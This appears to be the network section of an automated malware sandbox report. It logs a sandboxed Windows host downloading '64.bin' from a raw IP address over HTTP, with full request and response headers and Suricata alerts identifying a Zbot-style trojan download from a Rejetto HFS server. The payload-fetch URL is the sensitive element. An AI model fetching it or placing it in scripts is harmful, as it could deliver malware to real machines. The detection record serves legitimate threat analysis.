Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
GET
200
http://118.107.7.166/azu/64.bin
REQUEST
RESPONSE
BODY
GET /azu/64.bin HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: 118.107.7.166
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 307504
Accept-Ranges: bytes
Server: HFS 2.4.0 RC7
Set-Cookie: HFS_SID_=LABRMSoE5kAAAAAFSpq0Pw; path=/; HttpOnly
ETag: a6b83c46b99024d9d77e2af8d8210cd7
Last-Modified: Fri, 02 Jun 2023 08:49:19 GMT
Content-Disposition: attachment; filename*=UTF-8''64.bin; filename=64.bin
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.101:49162 -> 118.107.7.166:80 | 2018052 | ET MALWARE Zbot Generic URI/Header Struct .bin | A Network Trojan was detected |
| TCP 192.168.56.101:49162 -> 118.107.7.166:80 | 2018752 | ET MALWARE Generic .bin download from Dotted Quad | A Network Trojan was detected |
| TCP 118.107.7.166:80 -> 192.168.56.101:49162 | 2045860 | ET HUNTING Rejetto HTTP File Sever Response | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts